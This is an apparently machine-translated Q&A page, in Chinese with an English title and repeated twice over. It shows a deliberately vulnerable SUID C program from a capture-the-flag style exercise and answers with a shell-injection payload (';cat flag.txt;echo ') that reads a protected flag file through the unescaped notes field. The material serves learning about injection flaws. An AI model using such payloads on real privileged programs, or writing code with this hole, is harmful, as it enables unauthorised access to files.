如何 shell 命令注入一个文件
How to shell command inject a file
我有以下 SUID 的 c 程序。
int execute(char *command, char *envp[])
{
pid_t pid;
int status=0;
char *argv[] = {"/bin/bash", "-p", "-c", command, NULL};
if ((pid = fork()) < 0) { /* fork a child process */
printf("*** ERROR: forking child process failed\n");
exit(1);
}
else if (pid == 0) { /* for the child process: */
if (execvpe(*argv, argv, envp) < 0) { /* execute the command */
printf("*** ERROR: exec failed\n");
exit(1);
}
}
else { /* for the parent: */
while (wait(&status) != pid) /* wait for completion */
;
}
return status;
}
int main(int argc, char * argv[], char *envp[])
{
char command[256];
char name[64];
char menu[10];
char notes[128];
char filename[128] = PREFIX;
strcat(filename,"mynotes.txt");
printf("What's your name? ");
fgets(name, 64, stdin);
strtok(name,"\n");
printf("Welcome %s!\n", name);
do {
printf("\nWhat would you like to do? \n");
printf("[1] Check the weather\n");
printf("[2] Write a note\n");
printf("[3] Read my notes\n");
printf("[4] Get the flag\n");
printf("[5] Quit\n");
printf("Enter your choise (1-5): ");
fgets(menu,10,stdin);
switch(menu[0]) {
case '1':
strcpy(command, "/usr/bin/curl wttr.in/?format=4");
execute(command,envp);
break;
case '2':
printf("Please type in your notes (128 characters max.):\n");
fgets(notes, 128, stdin);
sprintf(command, "/bin/echo '%s' >> %s", notes, filename);
execute(command,envp);
break;
case '3':
sprintf(command,"/bin/cat %s", filename);
execute(command,envp);
break;
case '4':
printf("I'm sorry %s, I'm afraid I can't do that.\n", name);
break;
}
}
while(menu[0] != '5');
return 0;
}
我如何利用 shell 命令注入来显示同一用户拥有的另一个文件的内容。
例如,我尝试过 ./shellwrapper ;cat flag.txt - 但权限被拒绝,因为 ./shellwrapper 已完成并且 suid 不再有效。菜单选择是否存在漏洞?
Select选项2,并输入以下注释:
';cat flag.txt;echo '
之所以有效,是因为它不会转义音符输入,因此当您替换音符时,您会得到
/bin/echo '';cat flag.txt;echo '' >> mynotes.txt
这将由 SUID shell 执行。它会向终端输出flag.txt,并在mynotes.txt.
中写入一个空行
我有以下 SUID 的 c 程序。
int execute(char *command, char *envp[])
{
pid_t pid;
int status=0;
char *argv[] = {"/bin/bash", "-p", "-c", command, NULL};
if ((pid = fork()) < 0) { /* fork a child process */
printf("*** ERROR: forking child process failed\n");
exit(1);
}
else if (pid == 0) { /* for the child process: */
if (execvpe(*argv, argv, envp) < 0) { /* execute the command */
printf("*** ERROR: exec failed\n");
exit(1);
}
}
else { /* for the parent: */
while (wait(&status) != pid) /* wait for completion */
;
}
return status;
}
int main(int argc, char * argv[], char *envp[])
{
char command[256];
char name[64];
char menu[10];
char notes[128];
char filename[128] = PREFIX;
strcat(filename,"mynotes.txt");
printf("What's your name? ");
fgets(name, 64, stdin);
strtok(name,"\n");
printf("Welcome %s!\n", name);
do {
printf("\nWhat would you like to do? \n");
printf("[1] Check the weather\n");
printf("[2] Write a note\n");
printf("[3] Read my notes\n");
printf("[4] Get the flag\n");
printf("[5] Quit\n");
printf("Enter your choise (1-5): ");
fgets(menu,10,stdin);
switch(menu[0]) {
case '1':
strcpy(command, "/usr/bin/curl wttr.in/?format=4");
execute(command,envp);
break;
case '2':
printf("Please type in your notes (128 characters max.):\n");
fgets(notes, 128, stdin);
sprintf(command, "/bin/echo '%s' >> %s", notes, filename);
execute(command,envp);
break;
case '3':
sprintf(command,"/bin/cat %s", filename);
execute(command,envp);
break;
case '4':
printf("I'm sorry %s, I'm afraid I can't do that.\n", name);
break;
}
}
while(menu[0] != '5');
return 0;
}
我如何利用 shell 命令注入来显示同一用户拥有的另一个文件的内容。 例如,我尝试过 ./shellwrapper ;cat flag.txt - 但权限被拒绝,因为 ./shellwrapper 已完成并且 suid 不再有效。菜单选择是否存在漏洞?
Select选项2,并输入以下注释:
';cat flag.txt;echo '
之所以有效,是因为它不会转义音符输入,因此当您替换音符时,您会得到
/bin/echo '';cat flag.txt;echo '' >> mynotes.txt
这将由 SUID shell 执行。它会向终端输出flag.txt,并在mynotes.txt.